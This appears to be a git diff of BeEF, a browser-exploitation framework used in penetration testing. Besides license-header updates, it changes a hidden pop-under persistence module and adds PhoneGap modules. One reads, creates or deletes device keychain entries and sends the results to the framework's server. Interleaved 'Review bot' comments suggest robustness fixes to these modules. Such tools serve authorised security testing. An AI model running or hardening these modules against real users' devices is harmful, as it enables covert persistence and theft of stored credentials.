-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/persistence/iframe_above/module.rb b/modules/persistence/iframe_above/module.rb
index 053986199..14554755f 100644
--- a/modules/persistence/iframe_above/module.rb
+++ b/modules/persistence/iframe_above/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Iframe_above < BeEF::Core::Command
diff --git a/modules/persistence/man_in_the_browser/command.js b/modules/persistence/man_in_the_browser/command.js
index 148b64eb0..c016c79ef 100644
--- a/modules/persistence/man_in_the_browser/command.js
+++ b/modules/persistence/man_in_the_browser/command.js
@@ -1,17 +1,8 @@
-//
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+/*
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
 beef.execute(function() {
 try{
diff --git a/modules/persistence/man_in_the_browser/config.yaml b/modules/persistence/man_in_the_browser/config.yaml
index 1f022ef1d..984d292b5 100644
--- a/modules/persistence/man_in_the_browser/config.yaml
+++ b/modules/persistence/man_in_the_browser/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/persistence/man_in_the_browser/module.rb b/modules/persistence/man_in_the_browser/module.rb
index 75e8255c0..4632bc357 100644
--- a/modules/persistence/man_in_the_browser/module.rb
+++ b/modules/persistence/man_in_the_browser/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Man_in_the_browser < BeEF::Core::Command
diff --git a/modules/persistence/popunder_window/command.js b/modules/persistence/popunder_window/command.js
index 92cc6b07b..9ed5b6beb 100644
--- a/modules/persistence/popunder_window/command.js
+++ b/modules/persistence/popunder_window/command.js
@@ -1,23 +1,14 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 var result = "Pop-under window successfully created!";
- window.open('http://' + beef.net.host + ':' + beef.net.port + '/demos/plain.html','popunder','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur();
+ window.open(beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/demos/plain.html','popunder','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur();
 window.focus();
diff --git a/modules/persistence/popunder_window/config.yaml b/modules/persistence/popunder_window/config.yaml
index 8af49d40c..b3113f7a4 100644
--- a/modules/persistence/popunder_window/config.yaml
+++ b/modules/persistence/popunder_window/config.yaml
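Review bot: The rewritten `window.open(...)` line is still chained straight into `.blur()`, but `window.open` returns `null` when the browser's popup blocker refuses the window, so the new line throws a TypeError while `result` keeps saying "Pop-under window successfully created!". Capture the handle and branch on it: `var w = window.open(beef.net.httpproto + '://' + ... );` then `if (w) { w.blur(); } else { result = "Pop-under window blocked"; }`. The `beef.execute` callback continues past the last visible context line `window.focus();`, so whatever consumes `result` lies outside the hunk.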
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/persistence/popunder_window/module.rb b/modules/persistence/popunder_window/module.rb
index 850d1b6b6..0d92f5023 100644
--- a/modules/persistence/popunder_window/module.rb
+++ b/modules/persistence/popunder_window/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Popunder_window < BeEF::Core::Command
diff --git a/modules/phonegap/phonegap_beep/command.js b/modules/phonegap/phonegap_beep/command.js
index 1bf39ecce..b3a51c90a 100644
--- a/modules/phonegap/phonegap_beep/command.js
+++ b/modules/phonegap/phonegap_beep/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // make the phone beep
 //
 beef.execute(function() {
diff --git a/modules/phonegap/phonegap_beep/config.yaml b/modules/phonegap/phonegap_beep/config.yaml
index c474553aa..5dc6e1077 100644
--- a/modules/phonegap/phonegap_beep/config.yaml
+++ b/modules/phonegap/phonegap_beep/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/phonegap/phonegap_beep/module.rb b/modules/phonegap/phonegap_beep/module.rb
index 013ae3b3c..3993e9fb2 100644
--- a/modules/phonegap/phonegap_beep/module.rb
+++ b/modules/phonegap/phonegap_beep/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/phonegap/phonegap_check_connection/command.js b/modules/phonegap/phonegap_check_connection/command.js
index 470ab3638..d1bf87eb8 100644
--- a/modules/phonegap/phonegap_check_connection/command.js
+++ b/modules/phonegap/phonegap_check_connection/command.js
@@ -1,17 +1,9 @@
-//
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+/*
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 beef.execute(function() {
 var connection_type;
diff --git a/modules/phonegap/phonegap_check_connection/config.yaml b/modules/phonegap/phonegap_check_connection/config.yaml
index 37ebf924b..ab6256e52 100644
--- a/modules/phonegap/phonegap_check_connection/config.yaml
+++ b/modules/phonegap/phonegap_check_connection/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
@@ -20,8 +10,8 @@ beef:
 phonegap_check_connection:
 enable: true
 category: "Phonegap"
- name: "Check connection"
- description: "Find out connection type e.g. Wifi, 3G.."
+ name: "Check Connection"
+ description: "Find out the network connection type e.g. Wifi, 3G."
 authors: ["mh"]
 target:
 working: ["All"]
diff --git a/modules/phonegap/phonegap_check_connection/module.rb b/modules/phonegap/phonegap_check_connection/module.rb
index 708c0d384..03cb18f72 100644
--- a/modules/phonegap/phonegap_check_connection/module.rb
+++ b/modules/phonegap/phonegap_check_connection/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/phonegap/phonegap_detect/command.js b/modules/phonegap/phonegap_detect/command.js
index bc062c00c..49b4f55ce 100644
--- a/modules/phonegap/phonegap_detect/command.js
+++ b/modules/phonegap/phonegap_detect/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // detect phonegap
 //
 beef.execute(function() {
@@ -26,7 +17,8 @@ beef.execute(function() {
 + " cordova api: " + device.cordova
 + " platform: " + device.platform
 + " uuid: " + device.uuid
- + " version: " + device.version;
+ + " version: " + device.version
+ + " model: " + device.model;
 } catch(e) {
 phonegap_details = "unable to detect phonegap";
 }
diff --git a/modules/phonegap/phonegap_detect/config.yaml b/modules/phonegap/phonegap_detect/config.yaml
index e1e55e846..8fa326988 100644
--- a/modules/phonegap/phonegap_detect/config.yaml
+++ b/modules/phonegap/phonegap_detect/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/phonegap/phonegap_detect/module.rb b/modules/phonegap/phonegap_detect/module.rb
index 8242c79e8..b2d3709b5 100644
--- a/modules/phonegap/phonegap_detect/module.rb
+++ b/modules/phonegap/phonegap_detect/module.rb
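Review bot: The new `+ " model: " + device.model` term is concatenated without a guard, so on Cordova/PhoneGap builds where the property is absent the report reads `model: undefined` instead of reaching the `catch(e)` branch, which only fires on a thrown error (the older fields share this, but this is the line being added). If a missing field should be visible as such, write `+ " model: " + (device.model || 'n/a');` or test `typeof device.model` before appending. The string assignment and the enclosing `try` start outside the hunk.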
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/phonegap/phonegap_file_upload/command.js b/modules/phonegap/phonegap_file_upload/command.js
index c6b15e78e..bb8d239f0 100644
--- a/modules/phonegap/phonegap_file_upload/command.js
+++ b/modules/phonegap/phonegap_file_upload/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // phonegap_upload
 //
 beef.execute(function() {
diff --git a/modules/phonegap/phonegap_file_upload/config.yaml b/modules/phonegap/phonegap_file_upload/config.yaml
index f82d42fe8..6da1ecbf3 100644
--- a/modules/phonegap/phonegap_file_upload/config.yaml
+++ b/modules/phonegap/phonegap_file_upload/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/phonegap/phonegap_file_upload/module.rb b/modules/phonegap/phonegap_file_upload/module.rb
index 41b5f712f..c508ea21c 100644
--- a/modules/phonegap/phonegap_file_upload/module.rb
+++ b/modules/phonegap/phonegap_file_upload/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/phonegap/phonegap_geo_locate/command.js b/modules/phonegap/phonegap_geo_locate/command.js
index 15ea8fbf7..99f0ef075 100644
--- a/modules/phonegap/phonegap_geo_locate/command.js
+++ b/modules/phonegap/phonegap_geo_locate/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // geo locate
 //
 beef.execute(function() {
@@ -36,7 +27,7 @@ beef.execute(function() {
 // onError Callback receives a PositionError object
 //
 function onError(error) {
- console.log('code: ' + error.code + '\n' +
+ beef.debug('code: ' + error.code + '\n' +
 'message: ' + error.message + '\n');
 }
diff --git a/modules/phonegap/phonegap_geo_locate/config.yaml b/modules/phonegap/phonegap_geo_locate/config.yaml
index cb2a83894..75007ab6d 100644
--- a/modules/phonegap/phonegap_geo_locate/config.yaml
+++ b/modules/phonegap/phonegap_geo_locate/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/phonegap/phonegap_geo_locate/module.rb b/modules/phonegap/phonegap_geo_locate/module.rb
index 848d32e62..80fcb8d77 100644
--- a/modules/phonegap/phonegap_geo_locate/module.rb
+++ b/modules/phonegap/phonegap_geo_locate/module.rb
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_globalization_status/command.js b/modules/phonegap/phonegap_globalization_status/command.js new file mode 100644 index 000000000..e5f657b9b --- /dev/null +++ b/modules/phonegap/phonegap_globalization_status/command.js 
@@ -0,0 +1,34 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Phonegap_globalization_status
+//
+beef.execute(function() {
+ var result = '';
+
+ navigator.globalization.getPreferredLanguage(
+ function (language) {
+ result = 'language: ' + language.value + '\n';
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+ },
+ function () {
+ result = 'language: ' + 'fail\n';
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+ }
+ );
+
+ navigator.globalization.getLocaleName(
+ function (locale) {
+ result = 'locale: ' + locale.value + '\n';
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+ },
+ function () {
+ result = 'locale: ' + 'fail\n';
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+ }
+ );
+
+});
\ No newline at end of file
diff --git a/modules/phonegap/phonegap_globalization_status/config.yaml b/modules/phonegap/phonegap_globalization_status/config.yaml
new file mode 100644
index 000000000..7ced9d85a
--- /dev/null
+++ b/modules/phonegap/phonegap_globalization_status/config.yaml
@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# Phonegap_globalization_status
+#
+beef:
+ module:
+ phonegap_globalization_status:
+ enable: true
+ category: "Phonegap"
+ name: "Globalization Status"
+ description: "Examine device local settings"
+ authors: ["staregate"]
+ target:
+ working: ["All"]
diff --git a/modules/phonegap/phonegap_globalization_status/module.rb b/modules/phonegap/phonegap_globalization_status/module.rb
new file mode 100644
index 000000000..1bb32a3ae
--- /dev/null
+++ b/modules/phonegap/phonegap_globalization_status/module.rb
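Review bot: `'result='+result` in each of the four callbacks appends the device-reported value to the request body without encoding, so a `language.value` or `locale.value` containing `&`, `=`, `+` or non-ASCII characters is split or mangled when the server parses the parameter (assuming beef.net.send does not encode the string itself, which is not visible here). Use `'result=' + encodeURIComponent(result)` at each send. The two lookups also run concurrently and each send carries only its own value, so the module presumably ends up with whichever result arrived last under 'Result'; if both values are wanted in one record, collect them into `result` and send once after both callbacks have fired.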
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# // Phonegap_globalization_status
+
+class Phonegap_globalization_status < BeEF::Core::Command
+
+ def post_execute
+ content = {}
+ content['Result'] = @datastore['result']
+ save content
+ end
+end
diff --git a/modules/phonegap/phonegap_keychain/command.js b/modules/phonegap/phonegap_keychain/command.js
new file mode 100644
index 000000000..57d0f0693
--- /dev/null
+++ b/modules/phonegap/phonegap_keychain/command.js
@@ -0,0 +1,82 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// Phonegap_keychain +// +beef.execute(function() { + var servicename = "<%== @servicename %>"; + var key = "<%== @key %>"; + var value = "<%== @value %>"; + var action = "<%== @action %>"; + var result = ''; + var kc = ''; + + try { + kc = cordova.require("cordova/plugin/keychain"); + } catch (err) { + result = 'Unable to access keychain plugin'; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + } + + function onGet() + { + var win = function(value) { + result = result + "GET SUCCESS - Key: " + key + " Value: " + value; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + + }; + var fail = function(error) { + result = result + "GET FAIL - Key: " + key + " Error: " + error; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }; + + kc.getForKey(win, fail, key, servicename); + + } + + function onSet() + { + var win = function() { + result = result + "SET SUCCESS - Key: " + key; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }; + var fail = function(error) { + result = result + "SET FAIL - Key: " + key + " Error: " + error; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }; + + kc.setForKey(win, fail, key, servicename, value); + } + + function onRemove() + { + var win = function() { + result = result + "REMOVE SUCCESS - Key: " + key; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }; + var fail = function(error) { + result = result + "REMOVE FAIL - Key: " + key + " Error: " + error; + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); + }; + + kc.removeForKey(win, fail, key, servicename); + } + + if (kc !== undefined) { + switch(action) { + case 
'Read': + onGet(); + break; + case 'CreateUpdate': + onSet(); + break; + case 'Delete': + onRemove(); + break; + } + } + +}); diff --git a/modules/phonegap/phonegap_keychain/config.yaml b/modules/phonegap/phonegap_keychain/config.yaml new file mode 100644 index 000000000..bd1ae43d7 --- /dev/null +++ b/modules/phonegap/phonegap_keychain/config.yaml @@ -0,0 +1,17 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# Phonegap_keychain +# +beef: + module: + phonegap_keychain: + enable: true + category: "Phonegap" + name: "Keychain" + description: "Read/CreateUpdate/Delete Keychain Elements" + authors: ["staregate"] + target: + working: ["All"] diff --git a/modules/phonegap/phonegap_keychain/module.rb b/modules/phonegap/phonegap_keychain/module.rb new file mode 100644 index 000000000..17260b9ec --- /dev/null +++ b/modules/phonegap/phonegap_keychain/module.rb 
